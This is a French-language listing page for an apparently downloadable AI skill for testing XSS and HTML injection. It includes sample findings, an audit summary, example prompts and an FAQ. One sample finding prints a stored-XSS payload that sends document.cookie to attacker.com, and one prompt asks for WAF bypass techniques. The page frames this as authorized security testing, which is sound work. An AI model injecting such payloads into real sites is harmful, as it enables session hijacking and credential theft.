Compétences xss-html-injection
📦

xss-html-injection

Sûr ⚡ Contient des scripts⚙️ Commandes externes🌐 Accès réseau📁 Accès au système de fichiers

Test des vulnérabilités XSS et d'injection HTML

Les applications web contiennent souvent des failles de cross-site scripting et d'injection HTML que les attaquants exploitent pour voler des sessions et des identifiants. Cette compétence fournit une méthodologie systématique pour détecter, exploiter et valider les vulnérabilités d'injection côté client dans le cadre d'évaluations de sécurité autorisées.

Prend en charge: Claude Codex Code(CC)
🥉 73 Bronze
1

Télécharger le ZIP du skill

2

Importer dans Claude

Allez dans Paramètres → Capacités → Skills → Importer un skill

3

Activez et commencez à utiliser

Tester

Utilisation de "xss-html-injection". Tester le paramètre de recherche pour les XSS réfléchies

Résultat attendu:

  • Vulnérabilité trouvée : XSS réfléchie dans le paramètre /search?q=
  • Sévérité : Moyenne
  • Payload : <img src=x onerror=alert(document.domain)>
  • Contexte : Corps HTML - réflexion non encodée
  • Recommandation : Implémenter l'encodage de sortie pour toutes les entrées utilisateur

Utilisation de "xss-html-injection". Tester le champ bio du profil utilisateur pour les XSS stockées

Résultat attendu:

  • Vulnérabilité trouvée : XSS stockée dans la bio du profil utilisateur
  • Sévérité : Élevée (persistante, affecte tous les utilisateurs)
  • Payload : <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
  • Impact : Détournement de session pour tous les utilisateurs affichant le profil
  • Recommandation : Implémenter une validation stricte des entrées et un encodage de sortie

Audit de sécurité

Sûr
v1 • 2/25/2026

This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.

1
Fichiers analysés
505
Lignes analysées
5
résultats
1
Total des audits
Problèmes à risque faible (1)
SKILL.md:1-505
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.

Facteurs de risque

⚡ Contient des scripts (7)
SKILL.md:195 SKILL.md:319 SKILL.md:328 SKILL.md:198 SKILL.md:190 SKILL.md:467 SKILL.md:194
⚙️ Commandes externes (64)
SKILL.md:51-60 SKILL.md:60-65 SKILL.md:65-80 SKILL.md:80-110 SKILL.md:110-117 SKILL.md:117-121 SKILL.md:121-151 SKILL.md:151-158 SKILL.md:158-170 SKILL.md:170-175 SKILL.md:175-181 SKILL.md:181-188 SKILL.md:188-202 SKILL.md:202-207 SKILL.md:207-217 SKILL.md:217-221 SKILL.md:221-234 SKILL.md:234-241 SKILL.md:241-259 SKILL.md:259-264 SKILL.md:264-275 SKILL.md:275-281 SKILL.md:281-297 SKILL.md:297-301 SKILL.md:301-313 SKILL.md:313-317 SKILL.md:317-322 SKILL.md:322-331 SKILL.md:331-333 SKILL.md:333-337 SKILL.md:337-347 SKILL.md:347-352 SKILL.md:352-358 SKILL.md:358-364 SKILL.md:364-365 SKILL.md:365-366 SKILL.md:366-367 SKILL.md:367-368 SKILL.md:368-369 SKILL.md:369-370 SKILL.md:370-373 SKILL.md:373-377 SKILL.md:377-380 SKILL.md:380-392 SKILL.md:392-421 SKILL.md:421-426 SKILL.md:426-431 SKILL.md:431-436 SKILL.md:436-445 SKILL.md:445-447 SKILL.md:447-450 SKILL.md:450-452 SKILL.md:452-455 SKILL.md:455-457 SKILL.md:457-466 SKILL.md:466-468 SKILL.md:468-471 SKILL.md:471-473 SKILL.md:473-482 SKILL.md:482-484 SKILL.md:484-487 SKILL.md:487-489 SKILL.md:489-498 SKILL.md:498
🌐 Accès réseau (27)
SKILL.md:136 SKILL.md:382 SKILL.md:124 SKILL.md:130 SKILL.md:136 SKILL.md:145 SKILL.md:160 SKILL.md:163 SKILL.md:166 SKILL.md:169 SKILL.md:223 SKILL.md:226 SKILL.md:230 SKILL.md:246 SKILL.md:253 SKILL.md:254 SKILL.md:258 SKILL.md:375 SKILL.md:382 SKILL.md:434 SKILL.md:446 SKILL.md:451 SKILL.md:456 SKILL.md:456 SKILL.md:472 SKILL.md:483 SKILL.md:488
📁 Accès au système de fichiers (1)
SKILL.md:332

Motifs détectés

Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
Audité par: claude

Score de qualité

38
Architecture
100
Maintenabilité
87
Contenu
50
Communauté
100
Sécurité
87
Conformité aux spécifications

Ce que vous pouvez construire

Consultant en Sécurité Testant des Applications Web

Effectuer des tests d'intrusion autorisés pour identifier les vulnérabilités XSS dans les applications web des clients et fournir des recommandations de correction.

Développeur Validant la Gestion des Entrées

Tester les applications web personnalisées pendant le développement pour vérifier la mise en œuvre correcte de l'assainissement des entrées et de l'encodage de sortie.

Ingénieur QA Effectuant des Tests de Régression de Sécurité

Inclure les tests XSS et d'injection HTML dans les suites de tests de régression de sécurité pour détecter les vulnérabilités avant le déploiement en production.

Essayez ces prompts

Détection XSS de Base 
Use the XSS HTML injection skill to test the login form at https://example.com for reflected XSS vulnerabilities. Identify all input fields and test for basic XSS payloads.
Évaluation XSS Stockée 
Use the XSS HTML injection skill to test the comment section for stored XSS. Create test payloads that persist and execute when other users view the content.
Découverte XSS Basée sur le DOM 
Use the XSS HTML injection skill to analyze the JavaScript on https://example.com/dashboard for DOM-based XSS. Check location.hash and location.search handling.
Validation de Contournement de Filtre 
Use the XSS HTML injection skill to test if the WAF at https://example.com blocks common XSS payloads. Try HTML encoding, Unicode encoding, and tag variation bypass techniques.

Bonnes pratiques

  • Toujours obtenir une autorisation écrite avant de tester une application cible
  • Utiliser des payloads de démonstration contrôlés qui ne persistent pas et ne se propagent pas aux utilisateurs non intentionnels
  • Signaler immédiatement les vulnérabilités critiques via les canaux appropriés de réponse aux incidents

Éviter

  • Tester des systèmes de production sans autorisation écrite explicite
  • Utiliser les vulnérabilités découvertes pour un accès non autorisé ou une exfiltration de données
  • Déployer des payloads pouvant causer un déni de service ou des dommages au système

Foire aux questions

Cette compétence effectue-t-elle des attaques réelles sur les sites web cibles ?
Non. Cette compétence fournit une méthodologie et des payloads pour des tests de sécurité autorisés. Les utilisateurs doivent avoir une permission écrite explicite avant de tester un système.
Cette compétence peut-elle tester tous les types de XSS ?
La compétence couvre les XSS stockées, réfléchies et basées sur le DOM. Cependant, certaines variantes avancées comme la mutation XSS peuvent nécessiter des techniques spécialisées supplémentaires.
Quelle autorisation est requise avant d'utiliser cette compétence ?
Une autorisation écrite du propriétaire du système est requise. Elle doit inclure le périmètre défini, les méthodes de test autorisées et les procédures de traitement des données capturées.
Cette compétence fonctionne-t-elle contre les applications avec CSP ?
La CSP peut bloquer de nombreux payloads XSS. La compétence inclut des techniques de test de contournement CSP, mais certaines politiques CSP bien configurées peuvent empêcher l'exploitation réussie.
Les cookies de session peuvent-ils toujours être volés via XSS ?
Non. Les cookies marqués HttpOnly ne peuvent pas être accédés via JavaScript. Les applications modernes doivent utiliser cette protection pour les cookies de session.
Que dois-je faire si je trouve une vulnérabilité XSS critique ?
Signaler immédiatement via les canaux appropriés selon votre accord d'autorisation. Documenter la découverte avec une preuve de concept et fournir des recommandations de correction au propriétaire.

Détails du développeur

Auteur

sickn33

Licence

MIT

Dépôt

https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/xss-html-injection

Réf

main

Structure de fichiers

📄 SKILL.md